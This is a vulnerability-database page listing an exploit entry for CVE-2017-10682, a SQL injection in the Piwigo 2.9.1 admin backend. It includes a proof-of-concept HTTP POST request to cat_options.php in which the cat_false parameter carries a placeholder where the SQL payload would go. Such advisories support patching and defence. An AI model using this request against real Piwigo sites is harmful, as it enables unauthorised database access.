Lucene search

K

Piwigo 2.9.1 - cat_true cat_false SQL Injection

🗓️ 14 Dec 2017 00:00:00Reported by AkityoType 
exploitpack
 exploitpack
👁 11 Views

Piwigo 2.9.1 SQL Injection via cat_true/cat_false paramete

Show more
Related
Code
ReporterTitlePublishedViews
Family
Exploit DB
Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection
14 Dec 201700:00
exploitdb
OSV
CVE-2017-10682
29 Jun 201721:29
osv
Cvelist
CVE-2017-10682
29 Jun 201721:00
cvelist
Prion
Sql injection
29 Jun 201721:29
prion
NVD
CVE-2017-10682
29 Jun 201721:29
nvd
Packet Storm
Piwigo 2.9.1 SQL Injection
15 Dec 201700:00
packetstorm
0day.today
Piwigo 2.9.1 - cat_true / cat_false SQL Injection Vulnerability
14 Dec 201700:00
zdt
CVE
CVE-2017-10682
29 Jun 201721:29
cve
OpenVAS
Piwigo Multiple Vulnerabilities
5 Jul 201700:00
openvas
# # # # # 
# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection
# Dork: N/A
# Date: 12.12.2017
# Vendor Homepage: http://piwigo.org/
# Software Link: http://piwigo.org/basics/downloads
# Version: <= 2.9.1
# Category: Webapps
# Tested on: WiN7_x64/WIN10_X64
# CVE: CVE-2017-10682
# # # # #
# Exploit Author: Akityo
# Email: [email protected]
# # # # #
# Description:
#
# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter
# in the comments or status page to cat_options.php.
#
#
# # # # #
# Proof-of-Concent:
#
# POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1
# Host: www.test.com
# Content-Length: 34
# Cache-Control: max-age=0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
# Content-Type: application/x-www-form-urlencoded
# Accept-Encoding: gzip, deflate
# Accept-Language: zh-CN,zh;q=0.8
# Cookie: null
# Connection: close
#
# cat_false%5B%5D=[payload here]&trueify=%C2%AB
#
#  
# # # # #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Dec 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.002
11
.json
Report